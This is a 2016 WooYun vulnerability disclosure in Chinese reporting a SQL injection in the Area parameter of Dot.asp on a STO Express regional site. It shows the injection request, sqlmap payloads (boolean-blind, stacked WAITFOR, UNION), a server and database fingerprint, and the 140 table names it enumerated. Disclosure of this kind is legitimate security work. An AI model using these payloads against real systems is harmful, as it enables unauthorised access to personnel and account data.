当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0172232

漏洞标题:申通快递某站存在SQL注入漏洞

相关厂商:申通快递

漏洞作者: 路人甲

提交时间:2016-01-23 19:40

修复时间:2016-03-08 21:29

公开时间:2016-03-08 21:29

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-23: 细节已通知厂商并且等待厂商处理中
2016-01-24: 厂商已经确认,细节仅向厂商公开
2016-02-03: 细节向核心白帽子及相关领域专家公开
2016-02-13: 细节向普通白帽子公开
2016-02-23: 细节向实习白帽子公开
2016-03-08: 细节向公众公开

简要描述:

详细说明:

GET /Dot.asp?Area=-1' OR 1=1* --  HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.gdsto.com.cn/
Cookie: ASPSESSIONIDACBDCSSA=GANBFHOBEOMPODKONKIGHILO; ASPSESSIONIDACBADSTA=AHOJCDLCAKCKFIILHAAPCHIB
Host: www.gdsto.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

4.png

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.gdsto.com.cn:80/Dot.asp?Area=-1' OR 1=1 AND 6075=6075 --
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: http://www.gdsto.com.cn:80/Dot.asp?Area=-1' OR 1=1;WAITFOR DELAY '0:0:5'-- --
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: http://www.gdsto.com.cn:80/Dot.asp?Area=-1' OR 1=1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(106)+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(66)+CHAR(88)+CHAR(102)+CHAR(76)+CHAR(99)+CHAR(77)+CHAR(116)+CHAR(87)+CHAR(97)+CHAR(97)+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- --
---
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2005
Database: zktime_st
[140 tables]
+------------------------------+
| acc_antiback |
| acc_device |
| acc_door |
| acc_firstopen |
| acc_firstopen_emp |
| acc_holidays |
| acc_interlock |
| acc_levelset |
| acc_levelset_door_group |
| acc_levelset_emp |
| acc_linkageio |
| acc_map |
| acc_mapdoorpos |
| acc_monitor_log |
| acc_morecardempgroup |
| acc_morecardgroup |
| acc_morecardset |
| acc_timeseg |
| acc_wiegandfmt |
| action_log |
| areaadmin |
| att_attreport |
| att_overtime |
| att_waitforprocessdata |
| attcalclog |
| attexception |
| attparam |
| attrecabnormite |
| attshifts |
| auth_group |
| auth_group_permissions |
| auth_message |
| auth_permission |
| auth_user |
| auth_user_groups |
| auth_user_user_permissions |
| base_additiondata |
| base_appoption |
| base_basecode |
| base_datatranslation |
| base_operatortemplate |
| base_option |
| base_personaloption |
| base_strresource |
| base_strtranslation |
| base_systemoption |
| checkexact |
| checkinout |
| dbapp_viewmodel |
| dbbackuplog |
| departments |
| deptadmin |
| devcmds |
| devcmds_bak |
| devlog |
| django_content_type |
| django_session |
| empitemdefine |
| facetemplate |
| holidays |
| iclock |
| iclock_dininghall |
| iclock_dstime |
| iclock_notice |
| iclock_oplog |
| iclock_testdata |
| iclock_testdata_admin_area |
| iclock_testdata_admin_dept |
| leaveclass |
| leaveclass1 |
| meeting_detailmeeting |
| meeting_leave |
| meeting_meetingemp |
| meeting_meetingentity |
| meeting_meetingexact |
| meeting_meetingreport |
| meeting_originalrecord |
| meeting_room |
| meeting_room_devices |
| meeting_statisticsmeeting |
| meeting_type |
| meeting_validrecord |
| num_run |
| num_run_deil |
| operatecmds |
| personnel_area |
| personnel_cardtype |
| personnel_cities |
| personnel_countries |
| personnel_education |
| personnel_empchange |
| personnel_iccard |
| personnel_iccard_posmeal |
| personnel_iccard_use_mechine |
| personnel_issuecard |
| personnel_leavelog |
| personnel_meal |
| personnel_national |
| personnel_positions |
| personnel_state |
| pos_allowance |
| pos_allowancesetting |
| pos_batchtime |
| pos_carcashsz |
| pos_carcashszbak |
| pos_carcashtype |
| pos_cardmanage |
| pos_cardserial |
| pos_errors |
| pos_handconsume |
| pos_icconsumerlist |
| pos_icconsumerlistbak |
| pos_keydetail |
| pos_keyvalue |
| pos_keyvalue_use_mechine |
| pos_loseunitecard |
| pos_merchandise |
| pos_posdevlog |
| pos_poslog |
| pos_replenishcard |
| pos_splittime |
| pos_splittime_use_mechine |
| pos_storedetail |
| pos_timebrush |
| pos_timedetail |
| pos_timeslice |
| posparam |
| schclass |
| setuseratt |
| template |
| user_of_run |
| user_speday |
| user_temp_sch |
| userinfo |
| userinfo_attarea |
| useruusedsclasses |
| worktable_groupmsg |
| worktable_instantmsg |
| worktable_msgtype |
| worktable_usrmsg |
+------------------------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2016-01-24 13:51

厂商回复:

谢谢

最新状态:

暂无


漏洞评价:

评价